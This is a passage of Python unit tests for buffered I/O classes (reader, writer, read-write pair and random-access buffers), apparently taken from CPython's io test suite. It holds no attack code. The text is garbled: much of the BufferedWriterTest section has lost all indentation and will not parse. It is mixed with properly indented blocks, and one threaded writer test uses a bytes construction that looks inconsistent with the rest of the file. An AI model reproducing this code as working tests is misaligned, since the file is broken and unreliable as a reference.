        self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
    # Behavioural tests for BufferedReader; CBufferedReaderTest and
    # PyBufferedReaderTest bind self.tp to the C / Python implementation.
    read_mode = "rb"

    def test_constructor(self):
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(b"abc", bufio.read())
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        rawio = self.MockRawIO([b"abc"])
        bufio.__init__(rawio)
        self.assertEqual(b"abc", bufio.read())

    def test_uninitialized(self):
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegexp((ValueError, AttributeError),
                                'uninitialized|has no attribute',
                                bufio.read, 0)
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.read(0), b'')

    def test_read(self):
        for arg in (None, 7):
            rawio = self.MockRawIO((b"abc", b"d", b"efg"))
            bufio = self.tp(rawio)
            self.assertEqual(b"abcdefg", bufio.read(arg))
        # Invalid args
        self.assertRaises(ValueError, bufio.read, -2)

    def test_read1(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"b", bufio.read1(1))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"c", bufio.read1(100))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"d", bufio.read1(100))
        self.assertEqual(rawio._reads, 2)
        self.assertEqual(b"efg", bufio.read1(100))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1(100))
        self.assertEqual(rawio._reads, 4)
        # Invalid args
        self.assertRaises(ValueError, bufio.read1, -1)

    def test_readinto(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        b = bytearray(2)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"cd")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ef")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"gf")
        self.assertEqual(bufio.readinto(b), 0)
        self.assertEqual(b, b"gf")

    def test_readlines(self):
        def bufio():
            rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
            return self.tp(rawio)
        self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
        self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
        self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])

    def test_buffering(self):
        data = b"abcdefghi"
        dlen = len(data)

        # [buffer size, sequence of buffered read sizes,
        #  expected sequence of raw read sizes]
        tests = [
            [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
            [ 100, [ 3, 3, 3], [ dlen ] ],
            [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
        ]

        for bufsize, buf_read_sizes, raw_read_sizes in tests:
            rawio = self.MockFileIO(data)
            bufio = self.tp(rawio, buffer_size=bufsize)
            pos = 0
            for nbytes in buf_read_sizes:
                self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
                pos += nbytes
            # this is mildly implementation-dependent
            self.assertEqual(rawio.read_history, raw_read_sizes)

    def test_read_non_blocking(self):
        # Inject some None's in there to simulate EWOULDBLOCK
        rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcd", bufio.read(6))
        self.assertEqual(b"e", bufio.read(1))
        self.assertEqual(b"fg", bufio.read())
        self.assertEqual(b"", bufio.peek(1))
        self.assertIsNone(bufio.read())
        self.assertEqual(b"", bufio.read())

        rawio = self.MockRawIO((b"a", None, None))
        self.assertEqual(b"a", rawio.readall())
        self.assertIsNone(rawio.readall())

    def test_read_past_eof(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read(9000))

    def test_read_all(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read())

    @unittest.skipUnless(threading, 'Threading required for this test.')
    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes with exactly the same number of 0's,
            # 1's... 255's. This will help us check that concurrent reading
            # doesn't duplicate or forget contents.
            N = 1000
            l = list(range(256)) * N
            random.shuffle(l)
            s = bytes(bytearray(l))
            with self.open(support.TESTFN, "wb") as f:
                f.write(s)
            with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                results = []
                def f():
                    try:
                        # Intra-buffer read then buffer-flushing read
                        for n in cycle([1, 19]):
                            s = bufio.read(n)
                            if not s:
                                break
                            # list.append() is atomic
                            results.append(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                    "the following exceptions were caught: %r" % errors)
                s = b''.join(results)
                for i in range(256):
                    c = bytes(bytearray([i]))
                    self.assertEqual(s.count(c), N)
        finally:
            support.unlink(support.TESTFN)

    def test_misbehaved_io(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertRaises(IOError, bufio.seek, 0)
        self.assertRaises(IOError, bufio.tell)

    def test_no_extraneous_read(self):
        # Issue #9550; when the raw IO object has satisfied the read request,
        # we should not issue any additional reads, otherwise it may block
        # (e.g. socket).
        bufsize = 16
        for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
            rawio = self.MockRawIO([b"x" * n])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            # Simple case: one raw read is enough to satisfy the request.
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
            # A more complex case where two raw reads are needed to satisfy
            # the request.
            rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
    # BufferedReaderTest against the C implementation, plus C-only checks.
    tp = io.BufferedReader

    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2GB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.read)

    def test_misbehaved_io_read(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading different, so that
        # checking this is not so easy.
        self.assertRaises(IOError, bufio.read, 10)

    def test_garbage_collection(self):
        # C BufferedReader objects are collected.
        # The Python version has __del__, so it ends into gc.garbage instead
        rawio = self.FileIO(support.TESTFN, "w+b")
        f = self.tp(rawio)
        f.f = f
        wr = weakref.ref(f)
        del f
        support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegexp(TypeError, "BufferedReader"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
# BufferedReaderTest against the pure-Python implementation.
class PyBufferedReaderTest(BufferedReaderTest):
    tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
    def test_write_and_rewind(self):
        # Seeking backwards inside the buffered region, overwriting, then
        # seeking forward again must produce a consistent raw stream.
        raw = io.BytesIO()
        bufio = self.tp(raw, 4)
        self.assertEqual(bufio.write(b"abcdef"), 6)
        self.assertEqual(bufio.tell(), 6)
        bufio.seek(0, 0)
        # Overwrite the first two bytes only.
        self.assertEqual(bufio.write(b"XY"), 2)
        bufio.seek(6, 0)
        self.assertEqual(raw.getvalue(), b"XYcdef")
        self.assertEqual(bufio.write(b"123456"), 6)
        bufio.flush()
        self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
    def test_destructor(self):
        # Dropping the last reference to a buffered writer must flush
        # pending data to the raw stream (finalizer calls close()).
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        del bufio
        support.gc_collect()
        self.assertEqual(b"abc", writer._write_stack[0])
    def test_truncate(self):
        # Truncate implicitly flushes the buffer.
        with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
            bufio = self.tp(raw, 8)
            bufio.write(b"abcdef")
            self.assertEqual(bufio.truncate(3), 3)
            # truncate() must not move the logical stream position.
            self.assertEqual(bufio.tell(), 6)
        with self.open(support.TESTFN, "rb", buffering=0) as f:
            self.assertEqual(f.read(), b"abc")
    @unittest.skipUnless(threading, 'Threading required for this test.')
    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes from many threads and test they were
            # all flushed.
            N = 1000
            # NOTE(review): 'bytes' here presumably refers to the py3k-style
            # bytes shim this test module sets up — confirm at file top.
            contents = bytes(range(256)) * N
            sizes = cycle([1, 19])
            n = 0
            queue = deque()
            while n < len(contents):
                size = next(sizes)
                queue.append(contents[n:n+size])
                n += size
            del contents
            # We use a real file object because it allows us to
            # exercise situations where the GIL is released before
            # writing the buffer to the raw streams. This is in addition
            # to concurrency issues due to switching threads in the middle
            # of Python code.
            with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                def f():
                    # Worker: drain the shared deque until empty; record any
                    # exception so the main thread can fail the test.
                    try:
                        while True:
                            try:
                                s = queue.popleft()
                            except IndexError:
                                return
                            bufio.write(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                                 "the following exceptions were caught: %r" % errors)
                bufio.close()
            with self.open(support.TESTFN, "rb") as f:
                s = f.read()
            # Every byte value must appear exactly N times: nothing was lost
            # or duplicated despite the concurrent writers.
            for i in range(256):
                self.assertEqual(s.count(bytes([i])), N)
        finally:
            support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
    def test_write_error_on_close(self):
        # If flushing during close() fails, the error must propagate to the
        # caller, but the object must still end up closed.
        raw = self.MockRawIO()
        def bad_write(b):
            raise IOError()
        raw.write = bad_write
        b = self.tp(raw)
        b.write(b'spam')
        self.assertRaises(IOError, b.close) # exception not swallowed
        self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
    """Run the BufferedWriterTest suite against the C implementation
    (io.BufferedWriter), plus C-specific constructor/GC checks."""
    tp = io.BufferedWriter
    def test_constructor(self):
        BufferedWriterTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2GB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                bufio.__init__, rawio, sys.maxsize)
    def test_initialization(self):
        # Invalid buffer sizes must be rejected, and a failed re-__init__
        # must leave the object unusable (write raises ValueError).
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")
    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        rawio = self.FileIO(support.TESTFN, "w+b")
        f = self.tp(rawio)
        f.write(b"123xxx")
        f.x = f
        wr = weakref.ref(f)
        del f
        support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")
    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
    # Run the BufferedWriterTest suite against the pure-Python implementation.
    tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
    """Tests for BufferedRWPair, which couples an independent reader and an
    independent writer into one buffered read/write object.  Subclasses bind
    self.tp to the C or pure-Python implementation."""
    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
    def test_uninitialized(self):
        # Objects created via __new__ (no __init__) must fail cleanly and
        # become usable once __init__ is finally run.
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegexp((ValueError, AttributeError),
                                'uninitialized|has no attribute',
                                pair.read, 0)
        self.assertRaisesRegexp((ValueError, AttributeError),
                                'uninitialized|has no attribute',
                                pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)
    def test_detach(self):
        # A pair has no single underlying raw stream, so detach() is
        # unsupported.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertRaises(self.UnsupportedOperation, pair.detach)
    def test_constructor_max_buffer_size_deprecation(self):
        with support.check_warnings(("max_buffer_size is deprecated",
                                     DeprecationWarning)):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False
        self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False
        self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        # read(None) means "read to EOF", like read() with no argument.
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        self.assertEqual(pair.read(None), b"abc")
    def test_readlines(self):
        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        # The hint argument stops after the line that crosses the limit.
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read1(3), b"abc")
    def test_readinto(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        data = bytearray(5)
        self.assertEqual(pair.readinto(data), 5)
        self.assertEqual(data, b"abcde")
    def test_write(self):
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)
        pair.write(b"abc")
        pair.flush()
        pair.write(b"def")
        pair.flush()
        self.assertEqual(w._write_stack, [b"abc", b"def"])
    def test_peek(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        # peek() must not advance the read position.
        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")
    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())
    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())
    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())
    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.
    def test_close_and_closed(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
        pair.close()
        self.assertTrue(pair.closed)
    def test_reader_close_error_on_close(self):
        # A failure closing the reader must still close the writer, and the
        # exception must propagate.
        def reader_close():
            reader_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertTrue(pair.closed)
        self.assertFalse(reader.closed)
        self.assertTrue(writer.closed)
    def test_writer_close_error_on_close(self):
        # A failure closing the writer leaves the pair not-closed (the reader
        # was closed first, before the writer failure).
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('writer_non_existing', str(err.exception))
        self.assertFalse(pair.closed)
        self.assertTrue(reader.closed)
        self.assertFalse(writer.closed)
    def test_reader_writer_close_error_on_close(self):
        # When both closes fail, the reader's exception wins.
        def reader_close():
            reader_non_existing
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertFalse(pair.closed)
        self.assertFalse(reader.closed)
        self.assertFalse(writer.closed)
    def test_isatty(self):
        # The pair is a tty if *either* side is a tty.
        class SelectableIsAtty(MockRawIO):
            def __init__(self, isatty):
                MockRawIO.__init__(self)
                self._isatty = isatty
            def isatty(self):
                return self._isatty
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
        self.assertFalse(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())
    def test_weakref_clearing(self):
        brw = self.tp(self.MockRawIO(), self.MockRawIO())
        ref = weakref.ref(brw)
        brw = None
        ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
    # Run the BufferedRWPairTest suite against the C implementation.
    tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
    # Run the BufferedRWPairTest suite against the pure-Python implementation.
    tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    """Tests for BufferedRandom: inherits the full reader and writer suites
    and adds checks for interleaved reading/writing/seeking on one object."""
    read_mode = "rb+"
    write_mode = "wb+"
    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)
    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)
    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)
        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack) # Buffer writes
        # Reading forces the pending writes out to the raw stream first.
        self.assertEqual(b"ghjk", rw.read())
        self.assertEqual(b"dddeee", raw._write_stack[0])
    def test_seek_and_tell(self):
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)
        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))
        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        rw.seek(-4, 2)
        self.assertEqual(5, rw.tell())
        rw.seek(2, 1)
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())
        # Float positions are rejected.
        self.assertRaises(TypeError, rw.seek, 0.0)
    def check_flush_and_read(self, read_func):
        # Common driver: interleave writes with reads performed through
        # read_func, and check that flush() resets the read buffer.
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)
        self.assertEqual(b"ab", read_func(bufio, 2))
        bufio.write(b"12")
        self.assertEqual(b"ef", read_func(bufio, 2))
        self.assertEqual(6, bufio.tell())
        bufio.flush()
        self.assertEqual(6, bufio.tell())
        self.assertEqual(b"ghi", read_func(bufio))
        raw.seek(0, 0)
        raw.write(b"XYZ")
        # flush() resets the read buffer
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"XYZ", read_func(bufio, 3))
    def test_flush_and_read(self):
        self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
    def test_flush_and_readinto(self):
        def _readinto(bufio, n=-1):
            b = bytearray(n if n >= 0 else 9999)
            n = bufio.readinto(b)
            return bytes(b[:n])
        self.check_flush_and_read(_readinto)
    def test_flush_and_peek(self):
        def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream, otherwise peek() can return less.
            b = bufio.peek(n)
            if n != -1:
                b = b[:n]
            bufio.seek(len(b), 1)
            return b
        self.check_flush_and_read(_peek)
    def test_flush_and_write(self):
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)
        bufio.write(b"123")
        bufio.flush()
        bufio.write(b"45")
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"12345fghi", raw.getvalue())
        self.assertEqual(b"12345fghi", bufio.read())
    def test_threads(self):
        BufferedReaderTest.test_threads(self)
        BufferedWriterTest.test_threads(self)
    def test_writes_and_peek(self):
        def _peek(bufio):
            bufio.peek(1)
        self.check_writes(_peek)
        def _peek(bufio):
            pos = bufio.tell()
            bufio.seek(-1, 1)
            bufio.peek(1)
            bufio.seek(pos, 0)
        self.check_writes(_peek)
    def test_writes_and_reads(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.read(1)
        self.check_writes(_read)
    def test_writes_and_read1s(self):
        def _read1(bufio):
            bufio.seek(-1, 1)
            bufio.read1(1)
        self.check_writes(_read1)
    def test_writes_and_readintos(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.readinto(bytearray(1))
        self.check_writes(_read)
    def test_write_after_readahead(self):
        # Issue #6629: writing after the buffer was filled by readahead should
        # first rewind the raw stream.
        for overwrite_size in [1, 5]:
            raw = self.BytesIO(b"A" * 10)
            bufio = self.tp(raw, 4)
            # Trigger readahead
            self.assertEqual(bufio.read(1), b"A")
            self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs so
            bufio.write(b"B" * overwrite_size)
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            # If the write size was smaller than the buffer size, flush() and
            # check that rewind happens.
            bufio.flush()
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            s = raw.getvalue()
            self.assertEqual(s,
                b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
    def test_write_rewind_write(self):
        # Various combinations of reading / writing / seeking backwards / writing again
        def mutate(bufio, pos1, pos2):
            assert pos2 >= pos1
            # Fill the buffer
            bufio.seek(pos1)
            bufio.read(pos2 - pos1)
            bufio.write(b'\x02')
            # This writes earlier than the previous write, but still inside
            # the buffer.
            bufio.seek(pos1)
            bufio.write(b'\x01')
        b = b"\x80\x81\x82\x83\x84"
        for i in range(0, len(b)):
            for j in range(i, len(b)):
                raw = self.BytesIO(b)
                bufio = self.tp(raw, 100)
                mutate(bufio, i, j)
                bufio.flush()
                expected = bytearray(b)
                expected[j] = 2
                expected[i] = 1
                self.assertEqual(raw.getvalue(), expected,
                                 "failed result for i=%d, j=%d" % (i, j))
    def test_truncate_after_read_or_write(self):
        raw = self.BytesIO(b"A" * 10)
        bufio = self.tp(raw, 100)
        self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
        self.assertEqual(bufio.truncate(), 2)
        self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
        self.assertEqual(bufio.truncate(), 4)
    def test_misbehaved_io(self):
        BufferedReaderTest.test_misbehaved_io(self)
        BufferedWriterTest.test_misbehaved_io(self)
